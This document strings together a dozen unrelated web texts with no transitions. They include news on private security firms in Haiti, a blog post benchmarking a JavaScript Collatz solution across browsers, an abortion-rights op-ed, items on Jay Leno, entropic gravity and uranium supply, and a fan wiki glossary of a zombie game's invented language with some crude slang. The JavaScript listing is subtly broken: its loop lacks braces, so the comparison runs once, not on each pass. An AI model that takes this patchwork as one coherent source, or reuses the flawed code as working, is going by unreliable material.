Just days after Haiti was devastated by a powerful earthquake , The Nation reports that some of the same private security companies operating in Iraq and Afghanistan are preparing to set up shop in the Caribbean nation .
A trade group representing military contractors and private security firms , the International Peace Operations Association , has launched a Web site for prospective clients , listing member companies offering their services in Haiti .
Among them is Triple Canopy , a large private security firm that has operated under multi-million dollar contracts in Iraq .
Others are already in Haiti , like HART Security which is currently " providing security services to the media . "
The magazine also reports less well - known firms are offering protective services in Haiti .
All Pro Legal Investigations , a private security firm based in Florida , bought the domain name Haiti-Security.com on Jan. 15 , offering services like " high threat terminations " and protecting against " worker unrest . "
This would not be the first time private security firms have sought to profit from a natural disaster .
As The Nation reported in 2005 , guards from Blackwater , now called Xe , arrived in New Orleans in the immediate aftermath of Hurricane Katrina and were soon joined by employees of DynCorp , Intercon , American Security Group , Blackhawk , Wackenhut and an Israeli company called Instinctive Shooting International .
" Within two weeks of the hurricane , the number of private security companies registered in Louisiana jumped from 185 to 235 , " the magazine reported .
A while back a friend of mine introduced me to Project Euler which is a “ series of challenging mathematical / computer programming problems ” all of which should solved by a program that observes the “ one minute rule ”
“ … although it may take several hours to design a successful algorithm with more difficult problems , an efficient implementation will allow a solution to be obtained on a modestly powered computer in less than one minute . ”
Even though my primary programming language is C++
I started solving these problems using Perl due to it ’s faster development cycle .
Another advantage Perl has over C++ ( which I did n’t realize was an advantage at the time ) is that it ’s slow as molasses , especially when used for numeric computations .
This comes from the fact that Perl , being a dynamic language , has to deduce the types of objects at run-time , e.g. when you do $ i + 1 , Perl has to check what type $ i is in order to know if it needs to add two numbers or concatenate a number to a string .
[ Correction :
As Brad pointed out , Perl has a dot operator for concatenating strings which makes + unambiguous however the point stands for JavaScript and generally for many operations in dynamic languages . ]
So when I got to problem 14 my naive Perl implementation violated the one minute rule .
Had I used C++ it would have run in less than three seconds and you would be spared this blog post , but as it was , I tried to think of a way to make it faster .
Problem 14 goes as following :
The following iterative sequence is defined for the set of positive integers :
n → n /2 ( n is even )
n → 3 n + 1 ( n is odd )
The problem states that it ’s an unproven conjecture that by iteratively feeding the result of the function to itself you ’ll eventually reach 1 for all positive integers .
The question then is which number ( less than one million ) has to be fed into the function the most times before it reaches 1 .
My brute force implementation was too slow so I tried to come up with an optimization .
Consider the number 3 , its chain is :
3 → 10 → 5 → 16 → 8 → 4 → 2 → 1 : length is 8
If we look at 6 the chain is :
6 → 3 → 10 → 5 → 16 → 8 → 4 → 2 → 1 : length is 9
Notice that we pass through a number we saw before , there ’s no need to recompute the length of 3 ’s chain , we already know it ’s 8 .
I had to change my implementation to be recursive rather than iterative ( so that I will be able to cache the result of all the numbers I pass through ) .
In order to prove to myself that the difference in speed between C++ and Perl was due Perl ’s being a dynamic language I rewrote this in JavaScript ( the other dynamic language that I ’m somewhat familiar with ) .
My JavaScript implementation looks like this :
function next ( i ) { if ( i & 1 ) return i * 3 + 1 ; return i / 2 ; } function length ( n , cache ) { if ( n == 1 ) return 1 ; if ( cache !== null && n in cache ) return cache[ n ] ; var ret = 1 + length ( next ( n ) , cache ) ; if ( cache !== null ) cache [ n ] = ret ; return ret ; } function naive ( ) { check ( null , " Naive " ) ; } function optimized ( ) { check ( {} , " Optimized " ) ; } function check ( cache , msg ) { var max = [ 0 , 0 ] ; var lim = limit ( ) ; for ( var i = 1 ; i < lim ; ++i ) var curr = length ( i , cache ) ; if ( curr > max [ 0 ] ) max = [ curr , i ] ; } alert ( msg + " found " + max [ 1 ] + " ( chain length : " + max [ 0 ] + " ) " ) ; }
I then checked this implementation on the three browsers I have installed IE8 [ 1 ] , Firefox 3.5 and Chrome 3 with the following results :
IE took 168 seconds to run the naive solution while Firefox only took 101 seconds but that ’s nothing compared to Chrome ’s 2.8 , that ’s right , Chrome ’s V8 Javascript implementation is 60 times faster than IE ’s , more than an order of magnitude !
The second thing that struck me was how differently the same optimization manifested itself in the three browsers , in both IE and Chrome the optimization shaved off less than half the time ( less than 2 fold improvement ) while in Firefox the optimized version was 24 times faster than the naive one .
What I assume is happening is that JavaScript on the V8 engine behaves more like a statically typed language because it uses advanced JIT techniques such as trace trees which un -loop recursive function calls and makes ( checked ) assumptions about the types of variables .
< Edit >
It has been pointed out in comments to this post and on reddit that Firefox ’s TraceMonkey uses trace trees while Chrome ’s V8 does not .
I ’m not familiar with this field , I do remember reading about an optimization made by V8 and I thought that it was trace trees but I may have misremembered .
In any case it ’s pretty clear that V8 uses advanced JIT techniques ( although trace trees may not be one of them ) .
Now I realise that this is n’t a characteristic use of JavaScript , most JavaScript code is not intensively numeric and thus there ’s no point in optimizing for this usage .
What I find more worrying from the IE perspective is how much better the optimization behaves in Firefox than in IE , this optimization depends on property lookup in objects which is an extremely common operation in JavaScript .
Why there is such a difference between IE and Firefox in this aspect escapes me .
[ 1 ]
In order to get meaningful results on IE I had to disable the “ Stop running this script ” dialog ↩
January 12 , 2010
Jessica Hansen - Weaver explains why support for women 's right to abortion has lost so much ground in the public debate , and why we need to turn that around .
ABORTION IS rarely spoken of in public , and when it is , it 's usually being attacked .
Even so - called pro-choice Democrats rarely speak of what that choice is .
But the word is in the mainstream now -- as Democrats and Republicans alike use the " controversial " issue to make deals on a health care bill .
What has become apparent is that a woman 's right and access to abortion is under the worst attack in years .
A recent Gallup Poll showed that , for the first time since 1995 , when Gallup began asking respondents whether they considered themselves " pro-choice " or " pro-life , " a majority has identified themselves as pro-life - - 51 percent of people , compared to 49 percent identifying as pro-choice .
As a woman who has exercised her right to an abortion , the rightward shift in consciousness around this issue is frightening and infuriating .
When I found out that I was pregnant , I felt as though there were very few people to turn to , that even people who were " pro-choice " would be judgmental of my behavior -- that they would think , " You should have been more careful . "
Protesters at a rally to defend abortion rights
I really had no idea how common abortions are , mainly because it 's never talked about in public .
Instead , many women feel they must keep their abortions hidden from others .
This stigma even extends to popular culture -- from the Hollywood heroines of Juno to Waitress to Knocked Up , there are almost no sympathetic characters who are getting abortions .
So where does this stigma come from ?
One of the most obvious ways that the anti-abortion movement attempts to dissuade women from getting abortions is by protesting outside abortion clinics , where they routinely harass women seeking abortions as well as abortion providers .
There , they confront women with pictures of bloody fetuses , while " sidewalk counselors " implore women not to kill their " babies . "
We 've gotten to a point where we hear more about the " rights " and " personhood " of frozen embryos , unborn fetuses and stem cells , and not enough about the rights of women to control whether they have children or whether they can afford to have an abortion .
WHILE THE pro-life movement would like to see Roe v. Wade , the 1973 Supreme Court decision that made abortion legal , overturned ( something unlikely under a Democratic president ) , there 's a new consensus in Washington that abortion should be " safe , legal and rare " - - a phrase coined by Bill Clinton administration -- that attempts to justify further sharp restrictions on abortion .
For the most part , even the most ardent abortion rights supporters have come to embrace this notion .
So even while people may identify themselves as pro-choice , it 's qualified by a desire to reduce the number of abortions or restrict the kinds of abortions that are paid for by the government .
When Democratic Party politicians say that abortions should be " safe , legal and rare , " they are effectively talking about reducing abortions via restrictions , which accepts the outrageous premise that there is something wrong with having an abortion .
Hillary Clinton took this idea further when she called abortion a " sad , even tragic choice to many , many women " in front of 1,000 pro-choice supporters .
This was at an event celebrating the anniversary of Roe v. Wade !
Speaking at Notre Dame earlier this year , Barack Obama insisted that abortion is " a heart - wrenching decision for any woman " and called for " common ground " in reducing the number of abortions .
The problem with approaching abortion from the point of view of " reducing unwanted pregnancies " ( i.e. reducing the number of abortions ) is that it does n't challenge the right - wing rhetoric that " abortion hurts women . "
It 's also problematic because it fails to address the central issue : whether abortions are accessible and affordable .
Instead of demanding that women have access to what is a necessary for their reproductive health , " reducing unwanted pregnancies " puts the burden on individual women to make " better choices . "
Yet unintended pregnancies are the result of many factors : poverty , lack of access to contraception , rape , incest , lack of education around contraception , religious beliefs , etc .
And sometimes , it is just human error , a faulty condom or a choice not to have protected sex .
But regardless of why an unintended pregnancy occurs , we must defend the right of all women to terminate their pregnancies -- from first to third trimester .
We must reject any and all restrictions to abortion , which are founded on the idea that women do n't know what is best for women 's bodies .
Currently , 46 states in the U.S. have laws that require clinics and hospitals to submit some kind of reports about the abortions they perform .
According to a December 2009 report by the Guttmacher Institute , 17 states mandate that women be given counseling before an abortion .
And several states have included ultrasound provisions in their laws over the past decade , in a not - so - veiled attempt to personify the fetus and dissuade a woman from obtaining an abortion , not to mention increasing the cost of the procedure .
A district court in Oklahoma has temporarily blocked a new abortion law , House Bill 1595 , that would require women to provide detailed information about why they want the procedure .
That information , names omitted , would then be posted on a state Web site .
Information that women would have to report includes the age , marital status and education level of the woman ; the number of previous pregnancies ; a reason for the abortion ; the race of the woman ; and the nature of the mother 's relationship with the father .
The alarm bells should be instantly ringing : what is the Oklahoma government planning on doing with all that information ?
Those who support the measure say it will help them better understand why women are seeking abortions .
But Rep. Dan Sullivan ( R - Tulsa ) hinted at the real agenda when he said , " Because it 's a special procedure , we believe that it 's appropriate to be able to find out why these are going on and if there is something that we can do to change that . "
Caitlyn Wright , a senior at the University of Oklahoma who organized a rally at the state capitol opposing the new law put it more bluntly .
" The only question that 's not asked of these women is their name , " Wright told NPR .
" The real purpose of the bill is to shame women from having this procedure -- and I think it 's to scare them . "
DESPITE THE restrictions , abortion is not only one of the safest medical procedures in the country but also one of the most common .
One out of three women in the U.S. have an abortion by the time they 're 45 years old .
Yet abortion providers and women seeking abortions continue to be under attack .
One of the most tragic examples was the assassination of Wichita , Kans. , abortion provider Dr. George Tiller in May 2009 .
In a few weeks , on January 23 , anti-abortion bigots will bus tens of thousands to San Francisco for their annual " Walk for Life . "
Their mission is " to be a vocal and visual message that people of the West Coast stand for life . "
A few years ago , during the first " Walk for Life , " while our counterprotest was outnumbered , it was much closer in size .
But since then , we have seen that their side get more organized , while our side has n't been able to meet the challenge .
During the women 's liberation movement that eventually won Roe v. Wade , the slogan " Free Abortion on Demand " was put forward as a necessary step toward women 's equality .
In the context of this economic crisis , this slogan rings truer than ever before .
We have to start from the position that all women have an inalienable right to control what happens to their bodies -- without stigma , without obstruction and with full protection of the law .
Instead , the law has been used to deny us of this inalienable right , forcing greater numbers of women to either have unwanted pregnancies , or attempt self - induced , often deadly , abortions .
It 's time that women come out of the stigmatizing abortion closet and start fighting for real access to abortion , without restrictions .
We can no longer allow Roe v.
Wade to be stripped of all its teeth -- for this will mean more illegal , back - alley abortions , more unwanted childbirths , and that women will turn to more desperate measures in order to control their bodies and their lives .
As long as the cost of an abortion is prohibitive , as long as women are stigmatized for having abortions , as long as the " common sense " in society is that abortion is a bad thing , women will continue to be second - class citizens , at the mercy of government policy .
The Federal Depository library Program ( FDLP ) is a geographically dispersed network of 1250 libraries around the US who for over 150 years have worked with the Government Printing Office ( GPO ) to insure that government information is deposited in local libraries and freely available to everyone .
FDLP libraries have also assured the authenticity of government information through this distributed system .
Documents librarians have long been advocates for government transparency , freedom of information , privacy and civil liberties ( freedom to read etc ) .
FDLP librarians are now trying to apply that distributed concept to the digital world to figure out ways to give access to — and more importantly to preserve — digital government information .
They 're doing things like harvesting Web content ( see for example web archiving @ Stanford , Archive - it.org & CA digital Library 's web archiving service ) preserving digital govt information in distributed archives ( Government Documents Private LOCKSS Network ) , working with government agencies like GPO and transparency activists to advocate for bulk data , " digital deposit " and open content standards .
While the concept of a distributed system can be applied perfectly to the digital world ( think napster for govt information ! ) , the FDLP network is being threatened by the very idea that the FDLP is a print concept only .
With digital deposit , harvesting , bulk data , open standards etc , we can continue the FDLP to assure the distribution , access to and long - term preservation of government information .
Contact your local FDLP librarian and tell them you support a distributed digital FDLP .
Further reading :
Images from the completely great Best Titles Ever project .
Facebook launched a new page , yesterday , aimed at spotlighting the earthquake in Haiti and other disasters around the world .
The Global Relief page , live for less than 12 hours is up to 1,400 fans already , although we expect that number to climb quickly due to the attention on Haiti earthquake relief .
The page ’s design is currently aimed at moving Facebook users to other resources to enable them to assist in the Haiti disaster .
One tab uses the Causes app and directs users to donate under the “ Global Relief on Facebook ” moniker ; an Other Pages tab features 11 groups working in Haiti , including Yele Haiti and Catholic Relief Services .
On the Info tab , Facebook notes that the Global Relief page “ will spotlight efforts on Facebook to help respond to disasters around the globe . ”
This allows users to participate in relief efforts without having to leave Facebook ’s page .
This morning alone the page has already posted two status updates directing Facebook users to help by donating water or money to Oxfam America through the Causes app .
As of this morning “ Help Earthquake Survivors in Haiti ” had more than 7,600 members and had raised more than $ 34,000 dollars , and both were growing quickly .
In a candid interview with Oprah Winfrey airing on Thursday , Jay Leno opened up about the NBC shakeup regarding The Tonight Show , saying he felt “ sucker - punched ” by his recent guest Jimmy Kimmel , felt “ devastated ” when the network asked him six years ago to stand aside for Conan O’Brien and admitted to his current up - hill battle to become the good guy again .
NBC Exec : Conan , Letterman “ Chicken - Hearted , ” “ Gutless ” In Attacks On Leno
“ A lot of damage control ” has to take place Leno said .
He has been blamed for NBC ’s decision to reinstate him in his former 11:35 pm late - night slot .
O’Brien refused to push back the air time for The Tonight Show , fueling the fire between the late - night hosts .
“ I ’m going to work hard to rehabilitate [ the bad guy ] image . ”
VIDEO : Conan O’Brien – “ If NBC Does n’t Want People To See Me , Just Leave Me On NBC ”
Leno also addressed Kimmel ’s appearance during a Leno show a few weeks back during which Kimmel slammed him during their interview .
“ I got sucker - punched , ” Leno said , revealing that he opted against editing the portion out .
“ You get right up again [ after getting hit ] .
You do n’t whine and complain . ”
VIDEO : Jimmy Kimmel ’s Hilarious Impression Of Jay Leno !
Addressing NBC ’s decision to give O’Brien The Tonight Show to keep him at the network six years ago - despite the fact that Leno was still topping the ratings - the host admitted he had never planned to retire , despite saying so on - air .
“ I told a little white lie , ” he said .
“ It made it easier that way . ”
“ It broke my heart , it really did … I was devastated . ”
As for the future , he hopes that O’Brien will return to late - night television soon , allowing a fair competition between Leno , nemesis David Letterman and O’Brien .
“ I hope Conan gets a job somewhere else and we all compete together .
And the best man wins . ”
Walls alone wo n’t seal US borders ( Image : KPA / Zuma / Rex Features )
A MIGRANT makes a furtive dash across an unwalled rural section of a national border , only to be confronted by a tracked robot that looks like a tiny combat tank – with a gimballed camera for an eye .
As he passes the bug - eyed droid , it follows him and a border guard ’s voice booms from its loudspeaker .
He has illegally entered the country , he is warned , and if he does not turn back he will be filmed and followed by the robot , or by an airborne drone , until guards apprehend him .
Welcome to …
Two nanoparticles connected by a polymer will tend to be drawn together at finite temperatures ( though not at absolute zero ) because as the polymer chain explores the states available to it , there are many more tangled and balled up ones than stretched - out straight ones — even though there is no overt force pulling the chain to any particular tangled state .
Such a situation is called an entropic spring , and behaviors like this are some of the more interesting aspects of physics at the microscale .
An arXiv paper by physicist Erik P. Verlinde purports to show that gravitational effects have the same mathematical logic behind them ( in a very broad analogical sense ) , arising from the holographic universe description of physics ( a far - out variant of string theory ) .
Now I do n’t come close to having the physics to evaluate the theory , but Verlinde appears to be a respectable physicist .
Czech physicist Luboš Motl blogged about it :
So I remain undecided whether or not there is a sharp insight waiting along the lines of Verlinde ’s paper .
and then allowed Verlinde to guest - post a long explanatory comment .
The derivation of the Einstein equations ( and of Newton ’s law in the earlier sections ) follows very similar reasonings that exist in the literature , in particular Jacobson’s .
The connection with entropy and thermodynamics is made also there .
But in those previous works it is not clear WHY gravity has anything to do with entropy .
No explanation for this apparent connection between gravity and entropy has been given anywhere in the literature .
I mean not the precise details , even the reason why there should be such a connection in the first place was not understood .
My paper is the first that gives a reason why .
Inertia , and hence motion , is due to an entropic force when space is emergent .
This is new , and the essential point .
This means one HAS TO keep track of the amount of information .
Differences in this amount of information is precisely what makes one frame an inertial frame , and another a non-inertial frame .
Information causes motion .
This can be derived without assuming Newtonian mechanics .
“ Space is emergent ” ???
Yep , in the holographic theory , 3D space is an emergent phenomenon of a 2D information pattern ( see the link above ) .
Weird stuff , but no weirder than other forms of string theory .
As mentioned , I do n’t claim to follow this at the technical level , but given how important the math of entropy is at the microscale , it ’s fun to speculate about its being important at the most macro of macroscales as well .
If these are the facts , it ’s outrageous .
From ThinkProgress :
Spc. Alexis Hutchinson , a 21 - year - old Army cook , refused to deploy to Afghanistan in November because she had no one to take care of her 10 - month - old son .
Hutchinson said when she brought her situation to her superiors ’ attention , they told her that she would have to deploy anyway and place the child in foster care .
“ For her it was like , ‘ I could n’t abandon my child , ’ ” her civilian attorney Rai Sue Sussman told the AP .
After skipping her unit ’s flight out of Hunter Army Airfield in Savannah , GA , millitary police arrested her and confined her to the base while prosecutors decided how to proceed .
Today , the Army filed charges against her and , if convicted in a court - martial , she faces several years in prison and a dishonorable discharge .
Posted by Engineer - Poet on December 1 , 2009 - 10:25 am
Forecast of future uranium production by Ux Consulting
Michael Dittmar recently wrote a series of posts about nuclear energy that was published on The Oil Drum .
In the first post of the series , he said that uranium " civilian uranium stocks are expected to be exhausted during the next few years " and " the current uranium supply situation is unsustainable " .
It seems to me that this view is much too pessimistic , especially if prices rise from current levels .
In this post , I will explain why .
I will also talk about a bet with Dr. Dittmar regarding future production of nuclear electricity .
In support of my view of growing uranium production , below is a graph shown on the Ux Consulting website regarding future production .
Ux Consulting describes itself as " The industry 's leading source of consulting , data services , and publications on the uranium , conversion , and enrichments markets .
" Based on this graph , Ux Consulting expects uranium production to grow rapidly between now and 2020 , with especially large gains in Kazakhstan , Africa and Canada .
Some Indonesian fans say Hendri Mulyadi could make a useful striker
An Indonesia football fan became so fed up with his national team 's lacklustre performance that he invaded the pitch and tried to score a goal .
Hendri Mulyadi , 25 , took matters into his own hands as his team were heading for a 1 - 2 defeat against Oman .
He sprinted onto the pitch , got control of the ball and ran down the wing , but his attempt to score ended in failure after Oman 's keeper blocked the shot .
Police eventually overpowered him and he later apologised on a website .
" I was very disappointed with the Indonesian national team .
They never win .
It 's either lose or draw , " said Mr Mulyadi .
Defeat in the match in front of a 40,000 - strong Jakarta crowd means Indonesia failed to reach the finals of the Asian Cup for the first time since 1992 .
Several online postings next to footage of the incident on YouTube praised Mr Mulyadi 's antics .
One said : " He could be a future striker for Indonesia . "
Indonesia used to be one of Asia 's leading lights in soccer , but its fortunes have been on the slide recently , according to the BBC correspondent in Jakarta , Karishma Vaswani .
This page is intended to help one learn how to use and understand the language of zamgrh .
For immediate translations , use the dictionary .
Zombie Language & Codes
There are 4 different complex methods by which zombies communicate using Death Rattle : Zombese , Zombish , Zomban , and Zamgrh .
The former three refer to codes that can be translated , while the latter is a zombie attempt at language .
These serve several important functions including coordination with other zombies and limited communication with survivors .
The term " zombese " is sometimes incorrectly used to refer to all in - game zombie sounds .
Zombies may also communicate at a basic level using Flailing Gesture , gesturing at particular zombies and then in a direction to convey a message of movement , or using symbolic gestures , such as gesturing towards the sky as an indication of revivification , or at the ground to indicate brain rot .
Outside of the metagaming aspect , many zombie players also choose to convey information through their description , such as " zombie holds a sign saying .... " .
The key then is to get people to view the profile by speaking to them .
This is often used as a " cheap and dirty " way of getting information fast , avoiding the limits of Death Rattle .
Pre Death Rattle Zombie Expressions
Before learning Death Rattle , zombies are very limited in their ability to communicate .
All they have is a small list of noises they can make .
But even these can hold meaning to those who are paying attention .
Graagh . -
This emote is so basic that there is no real meaning .
Graaaagh ! -
This is an exclamatory .
Usually indicates the zombie wants to attack , or when he has been angered .
For example , it may be used as a response to a taunt from a survivor .
Grrrh . - Another vague emote with no accepted purpose .
Grh. - A casual greeting between zombies .
Mrh ? -
Easily the most common word for zombies to say .
It carries a variety of meanings , but the most common of these is , by far , a request to be revived .
Whenever a survivor is slain and wishes to return to life , they typically shamble over to the nearest revive point and Start spamming Mrh ?.
Hence the term Mrh Cow .
However , Mrh could also refer to life in general , or used as a questioning adverb , such as when , why , how , and so on .
Brnhr . - Indicates that the zombie is giving permission to be killed , either to help other zombies get the last few XP needed to level up , regain full health , or to avoid a headshot .
Basically , it means , " Eat me " .
The Death Rattle Lexicon
Death Rattle is a skill zombies can buy which enables them to speak .
However , zombie speech is limited to the letters a , b , g , h , m , n , r , and z as well as a few punctuation characters .
Several zombie groups developed complex codes such as Zombese , Zomban , and Zombish in which combinations of characters translate directly to English .
Zamgrh is a lexicographic attempt at forming a zombie language without code .
The following is a listing of all the known phrases heard from zombies using zamgrh and their meaning .
Also see the Zamgrh - English dictionary .
Orders
These are direct orders to all other zombies within earshot .
Ambarga - A very specific order , which is to create a " embargo " by Ransacking all the areas in which a survivor could find a Fuel Can so that any survivors will not be able to efficiently find fuel to power generators and take advantage of the search bonuses .
Bah - b!gh mah zambah .
- Literally ' Bad bite my zombie ' .
The zombie is asking nearby zombies to infect it , likely so it can parachute later .
Mangang ranzag - Maintain Ransack ; Refers to zombies staying inside a ransacked building so that survivors cannot repair it .
It may be used to order the occupation of a specific building if in the form Mangang ranzag ahn < building name > .
Gang ! - Getting everybody 's attention for an order .
Addressing the entire mob .
Grab arm , harm man ! - A signal to attack humans .
Harm bang - bang man ! -
A signal to kill all zombie hunters in a room .
- A signal to kill all zombie hunters in a room .
Harm bag - man ! -
A signal to kill all medical players in the area .
- A signal to kill all medical players in the area .
Grab h!m !! -
A simple signal to drag a survivor out into the street .
- A simple signal to drag a survivor out into the street .
Grab zam , anh brang zam haarh ! - A more complex signal to drag survivors .
Literally translates to ' Grab them , and bring them here !'
Grab mah zambah gab - A request that the listener should click ( " grab " ) on the link to the profile link provided with the spoken death rattle phrase .
Non -garbled info can be conveyed in the user 's profile as part of the zombies description or group membership , but zombie profiles are not generally available to be clicked on ; saying " Grab mah zambah gab " both makes your profile viewable , and encourages others to view it .
Grahn - " Groan "
This is an order to groan for more zombies , or " nah grahn " for selfish zombies to shut up and eat .
Hag - Literally , " hug . "
Zombies are known to be affectionate from time to time .
Survivors should be warned that hugging with zombies can not only lead to disease , but to brains being eaten .
Harm zaan - " Harm soon "
This is an order to wait at the current location so a horde can assemble .
Ranzag -
An order to ransack skill in the building or surrounding area .
Zgram ! - Scram !
Occasionally barked at babah zambahz who are annoying their zgaarah brazzahz .
An indicator that the scarier zombie would like the youngling to quickly depart .
Zmazh anh grab - Smash and grab .
Smash : the barricades , generator , radio , humans until they are near death .
Grab : Humans , and drag them out into the street .
A common tactic for more experienced zombies to aid younger brothers and sisters .
Zmazh Barragazh -
There are many variants of this all meaning " Smash Barricades " , instructing zombies to start a full scale attack on a building 's fortifications .
Zzzzhhhh !!!! - " Shhhhhh ! "
Sometimes uttered upon entering a library or by noise abatement societies .
Agz ah Grag
A new sophisticated means of communication has been observed amongst feral zombies .
Agz ah Grag ( pronounced X:00 or x o'clock by the living ) , is the phrase used by ferals to indicate a desire for coordinating an attack via this system .
Adjectives
B!g - Big .
Graan - Green , usually in reference to a suburb 's danger level .
" Mah zambahz ham zabarb am graan ! "
Nab!g - Small , literally not big .
Nah graan - Literally , " not green " .
Used for all colors except green , but is most often associated with a red danger level in a suburb .
Conjunctions
Arh - Or .
Az - As .
Bgaz - Because .
Haahabarh - But .
Nouns
Words used to convey the meaning of objects , locations , or people with strategic importance .
Anagram -
Since most zombies feel uncomfortable with proper grammar and vocabulary usage , they typically slur the word ' anagram ' to refer to graffiti .
That 's right folks , zombies are literate .
Armah baz - Army base , either Fort Creedy or Fort Perryn .
Armah manz - Army men , could refer either to actual soldiers or any survivor within a military base .
Baag - Book .
Baagbarn - Library , literally book - building .
Baba - Father .
Some zombies will refer to older , more experienced zombies by this .
Bag - Bag ; corpus
Baganz - Pagans
Bag man - Reference to the medical profession ( and the archetype 's " doctor 's bag " ) commonly refers to revivers .
Bang - bang - Guns , often part of larger words referring to various types of survivor / building ( see below ) .
Bang - bang haz - Police station .
Literally , " gun house " .
Bang - bang man - A zombie hunter with the headshot skill .
Barbaga zaarz - BBQ sauce
Barhah - A complicated concept .
Can imply holiness , but also used with regard to many religious holidays ( e.g. BARHAHmas ) - see Barhah .
Barhahraz - heaven ( Barhah - kingdom )
Barn - Building .
Also used as a suffix to many words to describe individual buildings ( such as Barhahbarn , Bagmanbarn )
Barragahz / Barragazh - Barricades .
There are a few regional variations on this ( usually concerning the H ) .
Barrm - form
Bazaarh - A mall .
From " bazaar " , a word meaning marketplace .
Bra!nbag - A human 's head or hat .
Essentially everything which might contain brains .
Bra!nbarn - university ( brain - building )
Bra!nzbarn - restaurant ( food - building )
Bra!nz - Brains ; generically food .
Sometimes , a zombie will refer to survivors as bra!nz , ignoring the rest of the body as unimportant .
B!mb bra!nbag - Pimp hat .
The ultimate Malton fashion accessory .
Gab - language , text , words , etc .
A very common root word for anything regarding communication .
Rather than the human equivalent , it does not imply that the speech is unimportant or casual .
Gaggarh - gagger , a cannabis cigarette
Ganarazharh - Generator ; metaphorically power
Gangbang - Death or killing , usually refers to killing large amounts of survivors .
More crudely , can be interpreted as " gangbang " or " orgy " ( of killing / feeding ) .
Ganz - Guns .
Also known as " bang - bangz " .
Gahzazambah - Zombie linguist .
Gharraghah ! - Similar to the interjection " Eureka " .
Used when a zombie hatches an excellent idea .
Grarrah - glory
Grazzaz - glasses
Habganna - will or desire .
Literally " have gonna " , or more intuitively , " gonna have " .
Hangang z!ngz - Paintings , or more literally , " hanging things " .
Used broadly to refer to any decorations .
Harmanz - Survivors , although many zombies view this word as being closer to the English " groceries " .
Hazbah / Bagman Haz - A hospital .
The latter translates as " Bagman House " , with a Bagman being a medic or doctor .
HB - Hit points .
As in " Harm mah , zambah brazzaz !
Ah haz nah HB .
Ah razzah zambahz harm mah , zan nah bang bang man . "
( " Harm me , zombie brothers !
I have three hit points .
I 'd rather zombies harm me , than the headshotting zombie hunters . " -
An extended version of brnhr . )
Mahb -
The MOB , or sometimes a horde in general , although gang is more common .
When used to mean horde , it implies not just a large gathering of zombies , but an organized group .
Manzhan - A mansion .
Maranara - Marinara .
Alternative to BBQ sauce , and better for dipping .
Marzan - Malton
Mrh -Gaaz -
A derisive term for zombies waiting at revive points .
( See Mrh Cows )
MrhBarn - NecroTech Building
Mrh man - NecroTech Man .
Namm - name
Nahm - nah - cookie , for any and all zombies who want a treat here and there
Rabrarah - Library .
Ragargarh - recorder
Rahzaba Zarmarba - Radio Transmitter .
Raz - kingdom
RNA Grabbah - DNA Extractor .
Rzz - Ressurection .
Zambahz - Zombies .
Zarh!ngh - Syringe .
Zgaarm - Storm
Verbs
Auxiliary Verbs
Ganna - future tense auxiliary : Mah zambah ganna grab harmanz ' I am going to attack people . '
Haz - past tense auxiliary : Mah zambah haz grab harmanz ' I attacked people '
B - past tense auxiliary : Mah zambah b rannan .
' I was running . '
Regular Verbs
Barg -
To eat .
Presumably taken from harmanbargarz .
Brang -
To bring , take , or carry .
Bzz -
To buzz .
Gab -
To speak .
A very common root word .
Gah - Go / Walk / Say .
Grab -
To attack ; to read ; to look at ; to judge .
This term also has a pejorative overtone of sex or rape , as in the phrase " Azzgrabbar . "
Grabgrab -
To analyze .
Hab -
To help .
Habganna -
To want .
Haz -
To have .
Mabban -
To move .
Mrh ? -
To live .
Na-mabban -
To be still .
Rabhabh -
To revive .
Ram -
To smash , attack ( generically ) .
Ranz -
To run ( participle , rannan )
Razzan -
To listen ; to overhear .
Z!ng -
To sing .
Zanz -
To dance or celebrate .
Often done by lighthearted zombies after destroying a building , most often a club .
Zhangh -
To stab , or more literally , " to shank " .
Zmazh
To smash ( relating more specifically to barricades ) , but used elsewhere .
Prepositions
Ahn - to / in
Ahn - na - ahn - between
Ahnna - into
Arahn - around
Grh - with :
Mah zambah barg Amarah Ragazzah grh barbaga zaarz ' My zombie ate Emeril Lagasse with BBQ sauce '
Na-ahnna - away from ( not into )
Za - to : Mah zambah ganna razzan za zambaz gab .
' My zombie will listen to zombies speak . '
Pronouns
G!a - who ; that ; which ( probably from the Spanish que )
H!n - him
Mah Zambah - I , myself .
Zhar - her
Coordinates
This has been invented as a system to communicate direction and number of block , useful for those who with Scent Trail to communicate those who know the system .
( Example " AHN - A- , ZAZ - N - " means ' one East , six North ' )
Direction
-N- - North
-A- - East
-R- - West
-Z- - South
also consider these English sound - alikes :
Narh - North
Az - East
Raz - West
Zah - South
Narh - Az - Northeast
Narh - Raz - Northwest
Zah - Az - Southeast
Zah - Raz - Southwest
Distance
! , !! , !!!
one , two , and three ; roman numerals , with ! = I
ANA - one
ZMA - two
ZHRAA - three
HAAR - four
RAAH - five
ZAZ - six
ZABAN - seven
AAGHZ - eight
NAHN - nine
ZHAN - ten
HANGARG - hundred
HARZANZ - thousand
M!RRH!AN - million ( occasionally marrarahn )
HRA !R - more than 4
Songs
Zombies tend to be a musical bunch .
Human survivors report hearing strains of Kumbayah ( Ghambarhah ) and other ditties amongst the less decayed zombies .
Please refer to The Zombie Song Lyrics Page .
Group Expressions
Groups of zombies will often develop rallying cries .
Many have been categorized , and can be found here .
Emotes
Zombies have feelings too , and this is how they express them .
Ahm nahm nahm - Apparently the undead have a fondness for LOLcats too .
ARRRRH !!! -
Anger , frustration , being a pirate .
Harh harh harh , BAHAHAHAHA , Grahahaha , and many other variations - Laughter .
BARHAH ! - Sometimes used as an attack signal or rallying cry , barhah is often used as an exclamatory .
Barhah also has an abstract spiritual meaning for some zombies , meaning , loosely , " the spirit of the horde " .
Barhah is the reason and the means by which one unlives .
This is exemplified by a quote from RRF leader Petrojsko's speech after the RRF 's defeat at Caiger Mall : " The harmanz have shown us that they indeed can taste some small part of the Barhah that makes us great .
In this , we can even claim a small victory "
Harrah ! - Hurry !
Harmanz , ambraz Barhah ! - Humans , embrace Barhah !
Used by fundamentalists and propagandists to encourage humans to embrace their new ( or impending ) state of undeath and become true zombies , instead of mindless Mrh? cows .
Hanh zah nahm ah Ghaan ! -
In the name of Kane !
Apparently , some zombies are former members of the Brotherhood of Nod .
It would be more correctly said as " Ahn Ghaanz nahm , " however this could be a dialectical representation .
Habbah Zangzgabang ! - Happy Thanksgiving !
Zombies are known to enjoy this New World holiday by feasting on harmanz with granbarah zaarz ( cranberry sauce ) .
Hab a habbah harrahaan - Have a Happy Halloween
Our favorite time of the year , so we 've got a rattle to suit .
Mah zombah gonna ram h!n banana ahnna h!n rabahz Zaghana - translate it and you 'll understand .
